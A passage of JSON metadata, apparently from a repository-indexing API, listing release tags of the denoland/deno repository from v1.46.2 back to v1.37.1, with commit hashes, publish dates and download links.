leases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"d